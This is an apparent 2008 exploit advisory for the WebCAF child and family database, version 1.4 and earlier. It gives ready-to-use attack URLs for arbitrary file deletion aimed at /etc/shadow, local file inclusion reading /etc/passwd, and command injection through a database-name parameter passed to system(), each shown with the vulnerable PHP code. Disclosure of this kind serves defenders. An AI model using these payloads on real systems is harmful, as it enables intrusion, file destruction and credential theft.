:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
#########################################################
# [ webcaf <= 1.4 ] Multiple Remote Vulnerabilities #
#########################################################
#
# Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..."
#
# Script site: http://www.webcaf.org/
# Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz
#
# [Arbitrary File Delete Vulnerability]
# Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;)
#
# Bug: ./webcaf/index.php (lines: 49-50 and 61-63)
#
# ...
# // Login, if necessary
# if (!$user_uid) include("modules/login.php");
# ...
# if ($_REQUEST[op] != "update") {
# if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid");
# }
# ...
#
#
# [LFI]
# Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd
# http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
#
# Bug: ./webcaf/index.php (lines: 68-131)
#
# ...
# switch ($_REQUEST[op]) {
# ...
# case "forms":
# $_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php"); //LFI
# break;
# ...
# case "reports":
# $_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php"); //LFI
# break;
# ...
# }
# ...
#
# Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
#
# Bug: ./webcaf/modules/view.php (lines: 12-21)
#
# ...
# if ($_REQUEST[view]) {
# ...
# include("views/$_REQUEST[view].php"); //LFI
# }
# ...
#
#
# [RCE]
# Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
#
# Bug: ./webcaf/index.php (lines: 127)
#
# ...
# $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\"");
# ...
#
# and a lot of other bugz...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-12-08]